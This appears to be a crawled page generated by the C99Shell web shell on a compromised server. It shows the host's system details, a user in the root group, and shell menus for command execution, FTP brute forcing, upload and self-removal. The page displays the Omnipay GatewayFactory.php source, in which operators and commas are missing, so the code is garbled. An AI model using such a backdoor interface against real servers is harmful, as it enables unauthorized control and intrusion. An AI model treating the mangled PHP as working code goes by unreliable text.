!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/omnipay/common/src/Common/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     GatewayFactory.php (2.24 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Omnipay Gateway Factory class
 */

namespace Omnipay\Common;

use 
Omnipay\Common\Exception\RuntimeException;
use 
Omnipay\Common\Http\ClientInterface;
use 
Symfony\Component\HttpFoundation\Request as HttpRequest;

/**
 * Omnipay Gateway Factory class
 *
 * This class abstracts a set of gateways that can be independently
 * registered, accessed, and used.
 *
 * Note that static calls to the Omnipay class are routed to this class by
 * the static call router (__callStatic) in Omnipay.
 *
 * Example:
 *
 * <code>
 *   // Create a gateway for the PayPal ExpressGateway
 *   // (routes to GatewayFactory::create)
 *   $gateway = Omnipay::create('ExpressGateway');
 * </code>
 *
 */
class GatewayFactory
{
    
/**
     * Internal storage for all available gateways
     *
     * @var array
     */
    
private $gateways = array();

    
/**
     * All available gateways
     *
     * @return array An array of gateway names
     */
    
public function all()
    {
        return 
$this->gateways;
    }

    
/**
     * Replace the list of available gateways
     *
     * @param array $gateways An array of gateway names
     */
    
public function replace(array $gateways)
    {
        
$this->gateways $gateways;
    }

    
/**
     * Register a new gateway
     *
     * @param string $className Gateway name
     */
    
public function register($className)
    {
        if (!
in_array($className$this->gateways)) {
            
$this->gateways[] = $className;
        }
    }

    
/**
     * Create a new gateway instance
     *
     * @param string               $class       Gateway name
     * @param ClientInterface|null $httpClient  A HTTP Client implementation
     * @param HttpRequest|null     $httpRequest A Symfony HTTP Request implementation
     * @throws RuntimeException                 If no such gateway is found
     * @return GatewayInterface                 An object of class $class is created and returned
     */
    
public function create($classClientInterface $httpClient nullHttpRequest $httpRequest null)
    {
        
$class Helper::getGatewayClassName($class);

        if (!
class_exists($class)) {
            throw new 
RuntimeException("Class '$class' not found");
        }

        return new 
$class($httpClient$httpRequest);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--